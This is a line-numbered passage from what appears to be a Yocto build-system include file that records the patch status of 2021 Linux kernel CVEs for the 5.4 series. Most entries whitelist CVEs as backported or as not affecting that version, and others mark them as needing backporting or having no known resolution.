5240# cpe-stable-backport: Backported in 5.4.108
5241CVE_CHECK_WHITELIST += "CVE-2021-28972"
5242
5243# cpe-stable-backport: Backported in 5.4.111
5244CVE_CHECK_WHITELIST += "CVE-2021-29154"
5245
5246# CVE-2021-29155 needs backporting (fixed from 5.12rc8)
5247
5248# cpe-stable-backport: Backported in 5.4.109
5249CVE_CHECK_WHITELIST += "CVE-2021-29264"
5250
5251# cpe-stable-backport: Backported in 5.4.106
5252CVE_CHECK_WHITELIST += "CVE-2021-29265"
5253
5254# fixed-version: only affects 5.8rc1 onwards
5255CVE_CHECK_WHITELIST += "CVE-2021-29266"
5256
5257# fixed-version: only affects 5.5rc1 onwards
5258CVE_CHECK_WHITELIST += "CVE-2021-29646"
5259
5260# cpe-stable-backport: Backported in 5.4.109
5261CVE_CHECK_WHITELIST += "CVE-2021-29647"
5262
5263# fixed-version: only affects 5.11rc1 onwards
5264CVE_CHECK_WHITELIST += "CVE-2021-29648"
5265
5266# fixed-version: only affects 5.10rc1 onwards
5267CVE_CHECK_WHITELIST += "CVE-2021-29649"
5268
5269# cpe-stable-backport: Backported in 5.4.109
5270CVE_CHECK_WHITELIST += "CVE-2021-29650"
5271
5272# fixed-version: only affects 5.10rc1 onwards
5273CVE_CHECK_WHITELIST += "CVE-2021-29657"
5274
5275# cpe-stable-backport: Backported in 5.4.103
5276CVE_CHECK_WHITELIST += "CVE-2021-30002"
5277
5278# fixed-version: only affects 5.12rc1 onwards
5279CVE_CHECK_WHITELIST += "CVE-2021-30178"
5280
5281# fixed-version: only affects 5.7rc1 onwards
5282CVE_CHECK_WHITELIST += "CVE-2021-31440"
5283
5284# cpe-stable-backport: Backported in 5.4.92
5285CVE_CHECK_WHITELIST += "CVE-2021-3178"
5286
5287# cpe-stable-backport: Backported in 5.4.117
5288CVE_CHECK_WHITELIST += "CVE-2021-31829"
5289
5290# cpe-stable-backport: Backported in 5.4.109
5291CVE_CHECK_WHITELIST += "CVE-2021-31916"
5292
5293# CVE-2021-32078 needs backporting (fixed from 5.13rc1)
5294
5295# cpe-stable-backport: Backported in 5.4.119
5296CVE_CHECK_WHITELIST += "CVE-2021-32399"
5297
5298# fixed-version: only affects 5.11rc1 onwards
5299CVE_CHECK_WHITELIST += "CVE-2021-32606"
5300
5301# cpe-stable-backport: Backported in 5.4.106
5302CVE_CHECK_WHITELIST += "CVE-2021-33033"
5303
5304# cpe-stable-backport: Backported in 5.4.119
5305CVE_CHECK_WHITELIST += "CVE-2021-33034"
5306
5307# CVE-2021-33061 needs backporting (fixed from 5.18rc1)
5308
5309# cpe-stable-backport: Backported in 5.4.124
5310CVE_CHECK_WHITELIST += "CVE-2021-33098"
5311
5312# fixed-version: only affects 5.11rc1 onwards
5313CVE_CHECK_WHITELIST += "CVE-2021-33135"
5314
5315# fixed-version: only affects 5.12rc8 onwards
5316CVE_CHECK_WHITELIST += "CVE-2021-33200"
5317
5318# cpe-stable-backport: Backported in 5.4.94
5319CVE_CHECK_WHITELIST += "CVE-2021-3347"
5320
5321# cpe-stable-backport: Backported in 5.4.95
5322CVE_CHECK_WHITELIST += "CVE-2021-3348"
5323
5324# cpe-stable-backport: Backported in 5.4.139
5325CVE_CHECK_WHITELIST += "CVE-2021-33624"
5326
5327# fixed-version: Fixed after version 5.4rc1
5328CVE_CHECK_WHITELIST += "CVE-2021-33630"
5329
5330# cpe-stable-backport: Backported in 5.4.240
5331CVE_CHECK_WHITELIST += "CVE-2021-33631"
5332
5333# cpe-stable-backport: Backported in 5.4.205
5334CVE_CHECK_WHITELIST += "CVE-2021-33655"
5335
5336# cpe-stable-backport: Backported in 5.4.202
5337CVE_CHECK_WHITELIST += "CVE-2021-33656"
5338
5339# cpe-stable-backport: Backported in 5.4.134
5340CVE_CHECK_WHITELIST += "CVE-2021-33909"
5341
5342# fixed-version: only affects 5.5rc1 onwards
5343CVE_CHECK_WHITELIST += "CVE-2021-3411"
5344
5345# cpe-stable-backport: Backported in 5.4.62
5346CVE_CHECK_WHITELIST += "CVE-2021-3428"
5347
5348# cpe-stable-backport: Backported in 5.4.101
5349CVE_CHECK_WHITELIST += "CVE-2021-3444"
5350
5351# cpe-stable-backport: Backported in 5.4.146
5352CVE_CHECK_WHITELIST += "CVE-2021-34556"
5353
5354# cpe-stable-backport: Backported in 5.4.128
5355CVE_CHECK_WHITELIST += "CVE-2021-34693"
5356
5357# cpe-stable-backport: Backported in 5.4.110
5358CVE_CHECK_WHITELIST += "CVE-2021-3483"
5359
5360# fixed-version: only affects 5.8rc1 onwards
5361CVE_CHECK_WHITELIST += "CVE-2021-34866"
5362
5363# fixed-version: only affects 5.8rc1 onwards
5364CVE_CHECK_WHITELIST += "CVE-2021-3489"
5365
5366# fixed-version: only affects 5.7rc1 onwards
5367CVE_CHECK_WHITELIST += "CVE-2021-3490"
5368
5369# fixed-version: only affects 5.7rc1 onwards
5370CVE_CHECK_WHITELIST += "CVE-2021-3491"
5371
5372# CVE-2021-3492 has no known resolution
5373
5374# CVE-2021-3493 needs backporting (fixed from 5.11rc1)
5375
5376# cpe-stable-backport: Backported in 5.4.124
5377CVE_CHECK_WHITELIST += "CVE-2021-34981"
5378
5379# fixed-version: only affects 5.9rc1 onwards
5380CVE_CHECK_WHITELIST += "CVE-2021-3501"
5381
5382# cpe-stable-backport: Backported in 5.4.129
5383CVE_CHECK_WHITELIST += "CVE-2021-35039"
5384
5385# cpe-stable-backport: Backported in 5.4.118
5386CVE_CHECK_WHITELIST += "CVE-2021-3506"
5387
5388# CVE-2021-3542 has no known resolution
5389
5390# fixed-version: only affects 5.10rc1 onwards
5391CVE_CHECK_WHITELIST += "CVE-2021-3543"
5392
5393# cpe-stable-backport: Backported in 5.4.146
5394CVE_CHECK_WHITELIST += "CVE-2021-35477"
5395
5396# cpe-stable-backport: Backported in 5.4.125
5397CVE_CHECK_WHITELIST += "CVE-2021-3564"
5398
5399# cpe-stable-backport: Backported in 5.4.125
5400CVE_CHECK_WHITELIST += "CVE-2021-3573"
5401
5402# cpe-stable-backport: Backported in 5.4.125
5403CVE_CHECK_WHITELIST += "CVE-2021-3587"
5404
5405# cpe-stable-backport: Backported in 5.4.98
5406CVE_CHECK_WHITELIST += "CVE-2021-3600"
5407
5408# cpe-stable-backport: Backported in 5.4.132
5409CVE_CHECK_WHITELIST += "CVE-2021-3609"
5410
5411# cpe-stable-backport: Backported in 5.4.102
5412CVE_CHECK_WHITELIST += "CVE-2021-3612"
5413
5414# cpe-stable-backport: Backported in 5.4.14
5415CVE_CHECK_WHITELIST += "CVE-2021-3635"
5416
5417# cpe-stable-backport: Backported in 5.4.160
5418CVE_CHECK_WHITELIST += "CVE-2021-3640"
5419
5420# cpe-stable-backport: Backported in 5.4.142
5421CVE_CHECK_WHITELIST += "CVE-2021-3653"
5422
5423# cpe-stable-backport: Backported in 5.4.133
5424CVE_CHECK_WHITELIST += "CVE-2021-3655"
5425
5426# cpe-stable-backport: Backported in 5.4.142
5427CVE_CHECK_WHITELIST += "CVE-2021-3656"
5428
5429# cpe-stable-backport: Backported in 5.4.112
5430CVE_CHECK_WHITELIST += "CVE-2021-3659"
5431
5432# CVE-2021-3669 needs backporting (fixed from 5.15rc1)
5433
5434# cpe-stable-backport: Backported in 5.4.136
5435CVE_CHECK_WHITELIST += "CVE-2021-3679"
5436
5437# CVE-2021-3714 has no known resolution
5438
5439# cpe-stable-backport: Backported in 5.4.29
5440CVE_CHECK_WHITELIST += "CVE-2021-3715"
5441
5442# cpe-stable-backport: Backported in 5.4.151
5443CVE_CHECK_WHITELIST += "CVE-2021-37159"
5444
5445# cpe-stable-backport: Backported in 5.4.141
5446CVE_CHECK_WHITELIST += "CVE-2021-3732"
5447
5448# fixed-version: only affects 5.14rc1 onwards
5449CVE_CHECK_WHITELIST += "CVE-2021-3736"
5450
5451# cpe-stable-backport: Backported in 5.4.144
5452CVE_CHECK_WHITELIST += "CVE-2021-3739"
5453
5454# cpe-stable-backport: Backported in 5.4.128
5455CVE_CHECK_WHITELIST += "CVE-2021-3743"
5456
5457# cpe-stable-backport: Backported in 5.4.151
5458CVE_CHECK_WHITELIST += "CVE-2021-3744"
5459
5460# cpe-stable-backport: Backported in 5.4.160
5461CVE_CHECK_WHITELIST += "CVE-2021-3752"
5462
5463# cpe-stable-backport: Backported in 5.4.144
5464CVE_CHECK_WHITELIST += "CVE-2021-3753"
5465
5466# cpe-stable-backport: Backported in 5.4.136
5467CVE_CHECK_WHITELIST += "CVE-2021-37576"
5468
5469# cpe-stable-backport: Backported in 5.4.224
5470CVE_CHECK_WHITELIST += "CVE-2021-3759"
5471
5472# cpe-stable-backport: Backported in 5.4.156
5473CVE_CHECK_WHITELIST += "CVE-2021-3760"
5474
5475# cpe-stable-backport: Backported in 5.4.151
5476CVE_CHECK_WHITELIST += "CVE-2021-3764"
5477
5478# cpe-stable-backport: Backported in 5.4.157
5479CVE_CHECK_WHITELIST += "CVE-2021-3772"
5480
5481# cpe-stable-backport: Backported in 5.4.134
5482CVE_CHECK_WHITELIST += "CVE-2021-38160"
5483
5484# fixed-version: only affects 5.6rc1 onwards
5485CVE_CHECK_WHITELIST += "CVE-2021-38166"
5486
5487# cpe-stable-backport: Backported in 5.4.141
5488CVE_CHECK_WHITELIST += "CVE-2021-38198"
5489
5490# cpe-stable-backport: Backported in 5.4.134
5491CVE_CHECK_WHITELIST += "CVE-2021-38199"
5492
5493# fixed-version: only affects 5.11rc1 onwards
5494CVE_CHECK_WHITELIST += "CVE-2021-38200"
5495
5496# fixed-version: only affects 5.11rc1 onwards
5497CVE_CHECK_WHITELIST += "CVE-2021-38201"
5498
5499# fixed-version: only affects 5.13rc1 onwards
5500CVE_CHECK_WHITELIST += "CVE-2021-38202"
5501
5502# fixed-version: only affects 5.13rc1 onwards
5503CVE_CHECK_WHITELIST += "CVE-2021-38203"
5504
5505# cpe-stable-backport: Backported in 5.4.136
5506CVE_CHECK_WHITELIST += "CVE-2021-38204"
5507
5508# cpe-stable-backport: Backported in 5.4.141
5509CVE_CHECK_WHITELIST += "CVE-2021-38205"
5510
5511# fixed-version: only affects 5.9rc1 onwards
5512CVE_CHECK_WHITELIST += "CVE-2021-38206"
5513
5514# fixed-version: only affects 5.6rc4 onwards
5515CVE_CHECK_WHITELIST += "CVE-2021-38207"
5516
5517# cpe-stable-backport: Backported in 5.4.125
5518CVE_CHECK_WHITELIST += "CVE-2021-38208"
5519
5520# fixed-version: only affects 5.7rc1 onwards
5521CVE_CHECK_WHITELIST += "CVE-2021-38209"
5522
5523# cpe-stable-backport: Backported in 5.4.153
5524CVE_CHECK_WHITELIST += "CVE-2021-38300"
5525
5526# CVE-2021-3847 has no known resolution
5527
5528# CVE-2021-3864 has no known resolution
5529
5530# CVE-2021-3892 has no known resolution
5531
5532# cpe-stable-backport: Backported in 5.4.155
5533CVE_CHECK_WHITELIST += "CVE-2021-3894"
5534
5535# cpe-stable-backport: Backported in 5.4.156
5536CVE_CHECK_WHITELIST += "CVE-2021-3896"
5537
5538# cpe-stable-backport: Backported in 5.4.171
5539CVE_CHECK_WHITELIST += "CVE-2021-3923"
5540
5541# cpe-stable-backport: Backported in 5.4.144
5542CVE_CHECK_WHITELIST += "CVE-2021-39633"
5543
5544# cpe-stable-backport: Backported in 5.4.70
5545CVE_CHECK_WHITELIST += "CVE-2021-39634"
5546
5547# fixed-version: Fixed after version 4.16rc1
5548CVE_CHECK_WHITELIST += "CVE-2021-39636"
5549
5550# cpe-stable-backport: Backported in 5.4.89
5551CVE_CHECK_WHITELIST += "CVE-2021-39648"
5552
5553# cpe-stable-backport: Backported in 5.4.106
5554CVE_CHECK_WHITELIST += "CVE-2021-39656"
5555
5556# cpe-stable-backport: Backported in 5.4.93
5557CVE_CHECK_WHITELIST += "CVE-2021-39657"
5558
5559# cpe-stable-backport: Backported in 5.4.165
5560CVE_CHECK_WHITELIST += "CVE-2021-39685"
5561
5562# cpe-stable-backport: Backported in 5.4.160
5563CVE_CHECK_WHITELIST += "CVE-2021-39686"
5564
5565# cpe-stable-backport: Backported in 5.4.165
5566CVE_CHECK_WHITELIST += "CVE-2021-39698"
5567
5568# fixed-version: Fixed after version 4.18rc6
5569CVE_CHECK_WHITELIST += "CVE-2021-39711"
5570
5571# fixed-version: Fixed after version 4.20rc1
5572CVE_CHECK_WHITELIST += "CVE-2021-39713"
5573
5574# fixed-version: Fixed after version 4.12rc1
5575CVE_CHECK_WHITELIST += "CVE-2021-39714"
5576
5577# CVE-2021-39800 has no known resolution
5578
5579# CVE-2021-39801 has no known resolution
5580
5581# CVE-2021-39802 has no known resolution
5582
5583# fixed-version: only affects 5.5rc1 onwards
5584CVE_CHECK_WHITELIST += "CVE-2021-4001"
5585
5586# cpe-stable-backport: Backported in 5.4.162
5587CVE_CHECK_WHITELIST += "CVE-2021-4002"
5588
5589# CVE-2021-4023 needs backporting (fixed from 5.15rc1)
5590
5591# fixed-version: only affects 5.10rc1 onwards
5592CVE_CHECK_WHITELIST += "CVE-2021-4028"
5593
5594# fixed-version: only affects 5.15rc1 onwards
5595CVE_CHECK_WHITELIST += "CVE-2021-4032"
5596
5597# cpe-stable-backport: Backported in 5.4.241
5598CVE_CHECK_WHITELIST += "CVE-2021-4037"
5599
5600# cpe-stable-backport: Backported in 5.4.145
5601CVE_CHECK_WHITELIST += "CVE-2021-40490"
5602
5603# cpe-stable-backport: Backported in 5.4.164
5604CVE_CHECK_WHITELIST += "CVE-2021-4083"
5605
5606# fixed-version: only affects 5.11rc1 onwards
5607CVE_CHECK_WHITELIST += "CVE-2021-4090"
5608
5609# fixed-version: only affects 5.11rc1 onwards
5610CVE_CHECK_WHITELIST += "CVE-2021-4093"
5611
5612# fixed-version: only affects 5.12rc1 onwards
5613CVE_CHECK_WHITELIST += "CVE-2021-4095"
5614
5615# fixed-version: only affects 5.10rc1 onwards
5616CVE_CHECK_WHITELIST += "CVE-2021-41073"
5617
5618# cpe-stable-backport: Backported in 5.4.168
5619CVE_CHECK_WHITELIST += "CVE-2021-4135"
5620
5621# CVE-2021-4148 needs backporting (fixed from 5.15)
5622
5623# cpe-stable-backport: Backported in 5.4.155
5624CVE_CHECK_WHITELIST += "CVE-2021-4149"
5625
5626# CVE-2021-4150 needs backporting (fixed from 5.15rc7)
5627
5628# cpe-stable-backport: Backported in 5.4.134
5629CVE_CHECK_WHITELIST += "CVE-2021-4154"
5630
5631# cpe-stable-backport: Backported in 5.4.171
5632CVE_CHECK_WHITELIST += "CVE-2021-4155"
5633
5634# cpe-stable-backport: Backported in 5.4.120
5635CVE_CHECK_WHITELIST += "CVE-2021-4157"
5636
5637# cpe-stable-backport: Backported in 5.4.210
5638CVE_CHECK_WHITELIST += "CVE-2021-4159"
5639
5640# cpe-stable-backport: Backported in 5.4.153
5641CVE_CHECK_WHITELIST += "CVE-2021-41864"
5642
5643# cpe-stable-backport: Backported in 5.4.189
5644CVE_CHECK_WHITELIST += "CVE-2021-4197"
5645
5646# cpe-stable-backport: Backported in 5.4.143
5647CVE_CHECK_WHITELIST += "CVE-2021-42008"
5648
5649# cpe-stable-backport: Backported in 5.4.162
5650CVE_CHECK_WHITELIST += "CVE-2021-4202"
5651
5652# cpe-stable-backport: Backported in 5.4.151
5653CVE_CHECK_WHITELIST += "CVE-2021-4203"
5654
5655# fixed-version: only affects 5.8rc1 onwards
5656CVE_CHECK_WHITELIST += "CVE-2021-4204"
5657
5658# CVE-2021-4218 needs backporting (fixed from 5.8rc1)
5659
5660# cpe-stable-backport: Backported in 5.4.148
5661CVE_CHECK_WHITELIST += "CVE-2021-42252"
5662
5663# fixed-version: only affects 5.10rc1 onwards
5664CVE_CHECK_WHITELIST += "CVE-2021-42327"
5665
5666# cpe-stable-backport: Backported in 5.4.158
5667CVE_CHECK_WHITELIST += "CVE-2021-42739"
5668
5669# cpe-stable-backport: Backported in 5.4.156
5670CVE_CHECK_WHITELIST += "CVE-2021-43056"
5671
5672# fixed-version: only affects 5.13rc1 onwards
5673CVE_CHECK_WHITELIST += "CVE-2021-43057"
5674
5675# fixed-version: only affects 5.10rc1 onwards
5676CVE_CHECK_WHITELIST += "CVE-2021-43267"
5677
5678# cpe-stable-backport: Backported in 5.4.156
5679CVE_CHECK_WHITELIST += "CVE-2021-43389"
5680
5681# cpe-stable-backport: Backported in 5.4.164
5682CVE_CHECK_WHITELIST += "CVE-2021-43975"
5683
5684# cpe-stable-backport: Backported in 5.4.174
5685CVE_CHECK_WHITELIST += "CVE-2021-43976"
5686
5687# cpe-stable-backport: Backported in 5.4.170
5688CVE_CHECK_WHITELIST += "CVE-2021-44733"
5689
5690# cpe-stable-backport: Backported in 5.4.260
5691CVE_CHECK_WHITELIST += "CVE-2021-44879"
5692
5693# cpe-stable-backport: Backported in 5.4.171
5694CVE_CHECK_WHITELIST += "CVE-2021-45095"
5695
5696# fixed-version: only affects 5.15rc1 onwards
5697CVE_CHECK_WHITELIST += "CVE-2021-45100"
5698
5699# fixed-version: only affects 5.7rc1 onwards
5700CVE_CHECK_WHITELIST += "CVE-2021-45402"
5701
5702# cpe-stable-backport: Backported in 5.4.169
5703CVE_CHECK_WHITELIST += "CVE-2021-45469"
5704
5705# fixed-version: only affects 5.13rc4 onwards
5706CVE_CHECK_WHITELIST += "CVE-2021-45480"
5707
5708# cpe-stable-backport: Backported in 5.4.133
5709CVE_CHECK_WHITELIST += "CVE-2021-45485"
5710
5711# cpe-stable-backport: Backported in 5.4.119
5712CVE_CHECK_WHITELIST += "CVE-2021-45486"
5713
5714# cpe-stable-backport: Backported in 5.4.160
5715CVE_CHECK_WHITELIST += "CVE-2021-45868"
5716
5717# fixed-version: only affects 5.7rc1 onwards
5718CVE_CHECK_WHITELIST += "CVE-2021-46283"
5719
5720# cpe-stable-backport: Backported in 5.4.112
5721CVE_CHECK_WHITELIST += "CVE-2021-46904"
5722
5723# fixed-version: only affects 5.12rc7 onwards
5724CVE_CHECK_WHITELIST += "CVE-2021-46905"
5725
5726# cpe-stable-backport: Backported in 5.4.127
5727CVE_CHECK_WHITELIST += "CVE-2021-46906"
5728
5729# CVE-2021-46908 needs backporting (fixed from 5.12rc8)
5730
5731# cpe-stable-backport: Backported in 5.4.114
5732CVE_CHECK_WHITELIST += "CVE-2021-46909"
5733
5734# fixed-version: only affects 5.11rc1 onwards
5735CVE_CHECK_WHITELIST += "CVE-2021-46910"
5736
5737# fixed-version: only affects 5.7rc1 onwards
5738CVE_CHECK_WHITELIST += "CVE-2021-46911"
5739
5740# fixed-version: only affects 5.7rc1 onwards
5741CVE_CHECK_WHITELIST += "CVE-2021-46912"
5742
5743# fixed-version: only affects 5.7rc1 onwards
5744CVE_CHECK_WHITELIST += "CVE-2021-46913"
5745
5746# fixed-version: only affects 5.9rc1 onwards
5747CVE_CHECK_WHITELIST += "CVE-2021-46914"
5748
5749# cpe-stable-backport: Backported in 5.4.114
5750CVE_CHECK_WHITELIST += "CVE-2021-46915"
5751
5752# fixed-version: only affects 5.11rc1 onwards
5753CVE_CHECK_WHITELIST += "CVE-2021-46916"
5754
5755# fixed-version: only affects 5.8rc6 onwards
5756CVE_CHECK_WHITELIST += "CVE-2021-46917"
5757
5758# fixed-version: only affects 5.11rc1 onwards
5759CVE_CHECK_WHITELIST += "CVE-2021-46918"
5760
5761# fixed-version: only affects 5.6rc1 onwards
5762CVE_CHECK_WHITELIST += "CVE-2021-46919"
5763
5764# fixed-version: only affects 5.6rc1 onwards
5765CVE_CHECK_WHITELIST += "CVE-2021-46920"
5766
5767# cpe-stable-backport: Backported in 5.4.115
5768CVE_CHECK_WHITELIST += "CVE-2021-46921"
5769
5770# fixed-version: only affects 5.12rc1 onwards
5771CVE_CHECK_WHITELIST += "CVE-2021-46922"
5772
5773# fixed-version: only affects 5.12rc1 onwards
5774CVE_CHECK_WHITELIST += "CVE-2021-46923"
5775
5776# cpe-stable-backport: Backported in 5.4.170
5777CVE_CHECK_WHITELIST += "CVE-2021-46924"
5778
5779# CVE-2021-46925 needs backporting (fixed from 5.16rc8)
5780
5781# CVE-2021-46926 needs backporting (fixed from 5.16rc7)
5782
5783# fixed-version: only affects 5.15rc1 onwards
5784CVE_CHECK_WHITELIST += "CVE-2021-46927"
5785
5786# CVE-2021-46928 needs backporting (fixed from 5.16rc7)
5787
5788# cpe-stable-backport: Backported in 5.4.170
5789CVE_CHECK_WHITELIST += "CVE-2021-46929"
5790
5791# cpe-stable-backport: Backported in 5.4.170
5792CVE_CHECK_WHITELIST += "CVE-2021-46930"
5793
5794# fixed-version: only affects 5.7rc1 onwards
5795CVE_CHECK_WHITELIST += "CVE-2021-46931"
5796
5797# cpe-stable-backport: Backported in 5.4.170
5798CVE_CHECK_WHITELIST += "CVE-2021-46932"
5799
5800# cpe-stable-backport: Backported in 5.4.170
5801CVE_CHECK_WHITELIST += "CVE-2021-46933"
5802
5803# cpe-stable-backport: Backported in 5.4.170
5804CVE_CHECK_WHITELIST += "CVE-2021-46934"
5805
5806# cpe-stable-backport: Backported in 5.4.170
5807CVE_CHECK_WHITELIST += "CVE-2021-46935"
5808
5809# cpe-stable-backport: Backported in 5.4.170
5810CVE_CHECK_WHITELIST += "CVE-2021-46936"
5811
5812# fixed-version: only affects 5.15rc1 onwards
5813CVE_CHECK_WHITELIST += "CVE-2021-46937"
5814
5815# cpe-stable-backport: Backported in 5.4.118
5816CVE_CHECK_WHITELIST += "CVE-2021-46938"
5817
5818# cpe-stable-backport: Backported in 5.4.118
5819CVE_CHECK_WHITELIST += "CVE-2021-46939"
5820
5821# fixed-version: only affects 5.10rc4 onwards
5822CVE_CHECK_WHITELIST += "CVE-2021-46940"
5823
5824# CVE-2021-46941 needs backporting (fixed from 5.13rc1)
5825
5826# fixed-version: only affects 5.12rc1 onwards
5827CVE_CHECK_WHITELIST += "CVE-2021-46942"
5828
5829# cpe-stable-backport: Backported in 5.4.118
5830CVE_CHECK_WHITELIST += "CVE-2021-46943"
5831
5832# cpe-stable-backport: Backported in 5.4.118
5833CVE_CHECK_WHITELIST += "CVE-2021-46944"
5834
5835# fixed-version: only affects 5.11rc1 onwards
5836CVE_CHECK_WHITELIST += "CVE-2021-46945"
5837
5838# fixed-version: only affects 5.12rc1 onwards
5839CVE_CHECK_WHITELIST += "CVE-2021-46947"
5840
5841# fixed-version: only affects 5.10rc1 onwards
5842CVE_CHECK_WHITELIST += "CVE-2021-46948"
5843
5844# fixed-version: only affects 5.10rc1 onwards
5845CVE_CHECK_WHITELIST += "CVE-2021-46949"
5846
5847# cpe-stable-backport: Backported in 5.4.118
5848CVE_CHECK_WHITELIST += "CVE-2021-46950"
5849
5850# cpe-stable-backport: Backported in 5.4.118
5851CVE_CHECK_WHITELIST += "CVE-2021-46951"
5852
5853# CVE-2021-46952 needs backporting (fixed from 5.13rc1)
5854
5855# cpe-stable-backport: Backported in 5.4.118
5856CVE_CHECK_WHITELIST += "CVE-2021-46953"
5857
5858# fixed-version: only affects 5.11rc1 onwards
5859CVE_CHECK_WHITELIST += "CVE-2021-46954"
5860
5861# cpe-stable-backport: Backported in 5.4.118
5862CVE_CHECK_WHITELIST += "CVE-2021-46955"
5863
5864# cpe-stable-backport: Backported in 5.4.118
5865CVE_CHECK_WHITELIST += "CVE-2021-46956"
5866
5867# fixed-version: only affects 5.12rc1 onwards
5868CVE_CHECK_WHITELIST += "CVE-2021-46957"
5869
5870# fixed-version: only affects 5.7rc4 onwards
5871CVE_CHECK_WHITELIST += "CVE-2021-46958"
5872
5873# CVE-2021-46959 needs backporting (fixed from 5.13rc1)
5874
5875# cpe-stable-backport: Backported in 5.4.118
5876CVE_CHECK_WHITELIST += "CVE-2021-46960"
5877
5878# cpe-stable-backport: Backported in 5.4.118
5879CVE_CHECK_WHITELIST += "CVE-2021-46961"
5880
5881# cpe-stable-backport: Backported in 5.4.118
5882CVE_CHECK_WHITELIST += "CVE-2021-46962"
5883
5884# fixed-version: only affects 5.5rc1 onwards
5885CVE_CHECK_WHITELIST += "CVE-2021-46963"
5886
5887# fixed-version: only affects 5.11rc1 onwards
5888CVE_CHECK_WHITELIST += "CVE-2021-46964"
5889
5890# CVE-2021-46965 needs backporting (fixed from 5.13rc1)
5891
5892# cpe-stable-backport: Backported in 5.4.118
5893CVE_CHECK_WHITELIST += "CVE-2021-46966"
5894
5895# fixed-version: only affects 5.8rc1 onwards
5896CVE_CHECK_WHITELIST += "CVE-2021-46967"
5897
5898# fixed-version: only affects 5.10rc3 onwards
5899CVE_CHECK_WHITELIST += "CVE-2021-46968"
5900
5901# CVE-2021-46969 needs backporting (fixed from 5.13rc1)
5902
5903# CVE-2021-46970 needs backporting (fixed from 5.13rc1)
5904
5905# cpe-stable-backport: Backported in 5.4.117
5906CVE_CHECK_WHITELIST += "CVE-2021-46971"
5907
5908# fixed-version: only affects 5.8rc1 onwards
5909CVE_CHECK_WHITELIST += "CVE-2021-46972"
5910
5911# fixed-version: only affects 5.8rc1 onwards
5912CVE_CHECK_WHITELIST += "CVE-2021-46973"
5913
5914# cpe-stable-backport: Backported in 5.4.117
5915CVE_CHECK_WHITELIST += "CVE-2021-46974"
5916
5917# fixed-version: only affects 5.8rc1 onwards
5918CVE_CHECK_WHITELIST += "CVE-2021-46976"
5919
5920# fixed-version: only affects 5.5rc1 onwards
5921CVE_CHECK_WHITELIST += "CVE-2021-46977"
5922
5923# fixed-version: only affects 5.11rc3 onwards
5924CVE_CHECK_WHITELIST += "CVE-2021-46978"
5925
5926# fixed-version: only affects 5.11rc1 onwards
5927CVE_CHECK_WHITELIST += "CVE-2021-46979"
5928
5929# fixed-version: only affects 5.8rc1 onwards
5930CVE_CHECK_WHITELIST += "CVE-2021-46980"
5931
5932# cpe-stable-backport: Backported in 5.4.120
5933CVE_CHECK_WHITELIST += "CVE-2021-46981"
5934
5935# CVE-2021-46982 needs backporting (fixed from 5.13rc2)
5936
5937# fixed-version: only affects 5.9rc1 onwards
5938CVE_CHECK_WHITELIST += "CVE-2021-46983"
5939
5940# cpe-stable-backport: Backported in 5.4.120
5941CVE_CHECK_WHITELIST += "CVE-2021-46984"
5942
5943# fixed-version: only affects 5.12rc5 onwards
5944CVE_CHECK_WHITELIST += "CVE-2021-46985"
5945
5946# fixed-version: only affects 5.10rc1 onwards
5947CVE_CHECK_WHITELIST += "CVE-2021-46986"
5948
5949# fixed-version: only affects 5.9rc1 onwards
5950CVE_CHECK_WHITELIST += "CVE-2021-46987"
5951
5952# cpe-stable-backport: Backported in 5.4.120
5953CVE_CHECK_WHITELIST += "CVE-2021-46988"
5954
5955# cpe-stable-backport: Backported in 5.4.120
5956CVE_CHECK_WHITELIST += "CVE-2021-46989"
5957
5958# fixed-version: only affects 5.10rc5 onwards
5959CVE_CHECK_WHITELIST += "CVE-2021-46990"
5960
5961# cpe-stable-backport: Backported in 5.4.120
5962CVE_CHECK_WHITELIST += "CVE-2021-46991"
5963
5964# cpe-stable-backport: Backported in 5.4.120
5965CVE_CHECK_WHITELIST += "CVE-2021-46992"
5966
5967# cpe-stable-backport: Backported in 5.4.120
5968CVE_CHECK_WHITELIST += "CVE-2021-46993"
5969
5970# fixed-version: only affects 5.5rc1 onwards
5971CVE_CHECK_WHITELIST += "CVE-2021-46994"
5972
5973# fixed-version: only affects 5.12rc1 onwards
5974CVE_CHECK_WHITELIST += "CVE-2021-46995"
5975
5976# fixed-version: only affects 5.10rc1 onwards
5977CVE_CHECK_WHITELIST += "CVE-2021-46996"
5978
5979# fixed-version: only affects 5.10rc7 onwards
5980CVE_CHECK_WHITELIST += "CVE-2021-46997"
5981
5982# cpe-stable-backport: Backported in 5.4.120
5983CVE_CHECK_WHITELIST += "CVE-2021-46998"
5984
5985# fixed-version: only affects 5.7rc3 onwards
5986CVE_CHECK_WHITELIST += "CVE-2021-46999"
5987
5988# fixed-version: only affects 5.8rc1 onwards
5989CVE_CHECK_WHITELIST += "CVE-2021-47000"
5990
5991# fixed-version: only affects 5.5rc1 onwards
5992CVE_CHECK_WHITELIST += "CVE-2021-47001"
5993
5994# fixed-version: only affects 5.11rc1 onwards
5995CVE_CHECK_WHITELIST += "CVE-2021-47002"
5996
5997# fixed-version: only affects 5.11 onwards
5998CVE_CHECK_WHITELIST += "CVE-2021-47003"
5999
6000# CVE-2021-47004 needs backporting (fixed from 5.13rc1)
6001
6002# CVE-2021-47005 needs backporting (fixed from 5.13rc1)
6003
6004# cpe-stable-backport: Backported in 5.4.120
6005CVE_CHECK_WHITELIST += "CVE-2021-47006"
6006
6007# fixed-version: only affects 5.8rc1 onwards
6008CVE_CHECK_WHITELIST += "CVE-2021-47007"
6009
6010# fixed-version: only affects 5.11rc1 onwards
6011CVE_CHECK_WHITELIST += "CVE-2021-47008"
6012
6013# fixed-version: only affects 5.12rc1 onwards
6014CVE_CHECK_WHITELIST += "CVE-2021-47009"
6015
6016# cpe-stable-backport: Backported in 5.4.119
6017CVE_CHECK_WHITELIST += "CVE-2021-47010"
6018
6019# fixed-version: only affects 5.11rc5 onwards
6020CVE_CHECK_WHITELIST += "CVE-2021-47011"
6021
6022# cpe-stable-backport: Backported in 5.4.119
6023CVE_CHECK_WHITELIST += "CVE-2021-47012"
6024
6025# cpe-stable-backport: Backported in 5.4.119
6026CVE_CHECK_WHITELIST += "CVE-2021-47013"
6027
6028# fixed-version: only affects 5.8rc7 onwards
6029CVE_CHECK_WHITELIST += "CVE-2021-47014"
6030
6031# cpe-stable-backport: Backported in 5.4.119
6032CVE_CHECK_WHITELIST += "CVE-2021-47015"
6033
6034# cpe-stable-backport: Backported in 5.4.119
6035CVE_CHECK_WHITELIST += "CVE-2021-47016"
6036
6037# fixed-version: only affects 5.8rc1 onwards
6038CVE_CHECK_WHITELIST += "CVE-2021-47017"
6039
